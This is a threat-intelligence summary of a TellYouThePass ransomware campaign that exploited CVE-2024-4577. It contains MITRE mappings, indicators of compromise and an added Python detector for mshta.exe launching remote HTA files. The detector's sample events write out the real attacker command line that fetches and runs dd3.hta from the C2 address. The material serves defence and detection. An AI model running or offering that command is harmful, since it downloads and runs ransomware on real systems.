Imperva Threat Research reports attacker activity weaponizing CVE-2024-4577 to distribute the TellYouThePass ransomware, using a living-off-the-land technique in which mshta.exe fetches and executes a remote payload. The campaign involves WebShell uploads, VBScript in HTA, in-memory PE loading, C2 communications, and file encryption across targeted systems. #TellYouThePass #CVE-2024-4577 #Mshta #HTA #VBScript #WebShell #C2
Keypoints
- Imperva Threat Research tracked attacker activity exploiting CVE-2024-4577 to deliver TellYouThePass ransomware.
- TellYouThePass ransomware has been active since 2019, targeting Windows and Linux and previously using CVEs such as CVE-2021-44228 and CVE-2023-46604.
- Attack vectors include WebShell upload attempts and campaigns to place ransomware on target systems.
- Attackers used the CVE-2024-4577 exploit to run arbitrary PHP code and leveraged mshta.exe to execute a remote HTML application payload.
- Initial infection uses an HTA file (dd3.hta) containing malicious VBScript that decodes and loads a PE into memory; a .NET variant was observed.
- Following infection, the malware performs C2 beaconing over HTTP, enumerates directories, kills processes, encrypts files, and writes a READ_ME10.html ransom note into the web root containing the TellYouThePass payment details.
- Community discussions emerged quickly, with recommendations to patch vulnerabilities, deploy a Web Application Firewall, and use antivirus as defenses.
MITRE Techniques
- [T1218.005] Mshta – The attackers use the mshta.exe binary to execute a remote HTML application payload hosted on an attacker-controlled web server, so the payload runs under a signed, Microsoft-shipped Windows binary. “using the ‘system’ function to run an HTML application file hosted on an attacker-controlled web server via the mshta.exe binary.”
- [T1059.005] VBScript – The initial infection uses an HTA file that contains malicious VBScript. “The initial infection is performed with the use of an HTA file (dd3.hta), which contains a malicious VBScript.”
- [T1505.003] Web Shell – WebShell upload attempts are part of the attack vector, used to gain and maintain access to targets. “…including WebShell upload attempts…”
- [T1071.001] Web Protocols – The malware communicates with a C2 server over HTTP for infection notification. “the sample sends an HTTP request to the command-and-control (C2) server containing details about the infected machine as a notification of infection.”
- [T1083] File and Directory Discovery – The binary enumerates directories as part of preparation for encryption. “The binary then enumerates directories…”
- [T1562.001] Impair Defenses – The malware kills processes to hinder defenses during execution. “kills processes…”
- [T1486] Data Encrypted for Impact – The ransomware encrypts files within enumerated directories. “encrypts files within each enumerated directory that has a defined file extension.”
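The mshta.exe step in the chain above (T1218.005) is the most detectable point: a Windows-signed binary launched with a remote http/https URL on its command line, spawned by the web tier. The following detector is an added example written for this summary, not code from Imperva or from the report; it runs over constructed process-creation records with Sysmon Event ID 1-style field names. The set of web-tier parent process names (php-cgi.exe, httpd.exe, w3wp.exe and so on) is an assumption of the example, and the only IoC it carries is the C2 address 88.218.76[.]13 quoted in the report, refanged.

```python
"""Detect mshta.exe executing a remote HTA (MITRE T1218.005).

Added example; the event records below are constructed, not captured.
"""
import re
from typing import Dict, Iterable, List, Optional
from urllib.parse import urlparse

# A remote http/https URL handed to mshta.exe on its command line.
REMOTE_URL_RE = re.compile(r"""https?://[^\s"']+""", re.IGNORECASE)

# Parent images that mean the web tier spawned mshta.exe. These names are an
# assumption of this example (typical PHP/IIS binaries on Windows), not
# values taken from the report.
WEB_PARENTS = {"php-cgi.exe", "php.exe", "httpd.exe", "nginx.exe", "w3wp.exe"}

# Network IoC from the report, refanged from 88.218.76[.]13.
KNOWN_C2_HOSTS = {"88.218.76.13"}


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(event: Dict[str, str]) -> Optional[Dict[str, object]]:
    """Return a finding when mshta.exe is launched with a remote URL, else None."""
    if _basename(event.get("Image", "")) != "mshta.exe":
        return None
    match = REMOTE_URL_RE.search(event.get("CommandLine", ""))
    if match is None:
        return None  # local .hta or no URL argument: outside this rule
    url = match.group(0)
    host = urlparse(url).hostname or ""
    parent = _basename(event.get("ParentImage", ""))
    ioc_match = host in KNOWN_C2_HOSTS
    # A web-tier parent or a known C2 host raises severity; any remote HTA
    # launch is still worth triage.
    severity = "high" if (parent in WEB_PARENTS or ioc_match) else "medium"
    return {
        "technique": "T1218.005",
        "event": event.get("EventId", ""),
        "url": url,
        "host": host,
        "parent": parent,
        "ioc_match": ioc_match,
        "severity": severity,
    }


def detect(events: Iterable[Dict[str, str]]) -> List[Dict[str, object]]:
    """Run classify() over a stream of process-creation events."""
    return [f for f in (classify(e) for e in events) if f is not None]


# Constructed process-creation records (Sysmon EID 1-style fields).
SAMPLE_EVENTS = [
    {   # mirrors the chain in the report: PHP spawns mshta pulling dd3.hta
        "EventId": "1",
        "Image": r"C:\Windows\System32\mshta.exe",
        "CommandLine": r"mshta.exe http://88.218.76.13/dd3.hta",
        "ParentImage": r"C:\php\php-cgi.exe",
    },
    {   # benign: local HTA opened from Explorer
        "EventId": "2",
        "Image": r"C:\Windows\System32\mshta.exe",
        "CommandLine": r'"C:\Windows\System32\mshta.exe" "C:\Tools\helper.hta"',
        "ParentImage": r"C:\Windows\explorer.exe",
    },
    {   # not mshta at all
        "EventId": "3",
        "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
        "CommandLine": r"chrome.exe https://example.com/",
        "ParentImage": r"C:\Windows\explorer.exe",
    },
    {   # remote HTA from cmd.exe against a constructed host (RFC 5737 range)
        "EventId": "4",
        "Image": r"C:\Windows\System32\mshta.exe",
        "CommandLine": r"mshta.exe https://198.51.100.7/x.hta",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
    },
]


if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        flag = "IOC" if finding["ioc_match"] else ""
        print(finding["severity"], finding["event"], finding["url"], finding["parent"], flag)
```

Run as-is, the script reports event 1 as high (web-tier parent and C2 host match) and event 4 as medium (remote HTA, unknown host, cmd.exe parent), and stays silent on the local HTA and the browser. The rule keys on behaviour rather than the hash or IP alone, so it still fires if the attackers rotate infrastructure or re-pack dd3.hta.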
Indicators of Compromise
- [URL] – HTA delivery link used in infection chain – hxxp://88.218.76[.]13/dd3.hta
- [IP] – Command-and-control / C2 server – 88.218.76[.]13
- [Hash] – HTA sample hashes – 95279881525d4ed4ce25777bb967ab87659e7f72235b76f9530456b48a00bac3, 5a2b9ddddea96f21d905036761ab27627bd6db4f5973b006f1e39d4acb04a618
- [Hash] – Extracted .NET binary hash – 9562AD2C173B107A2BAA7A4986825B52E881A935DEB4356BF8B80B1EC6D41C53
- [Bitcoin Wallet] – Ransom payment address used by the campaign – bc1qnuxx83nd4keeegrumtnu8kup8g02yzgff6z53l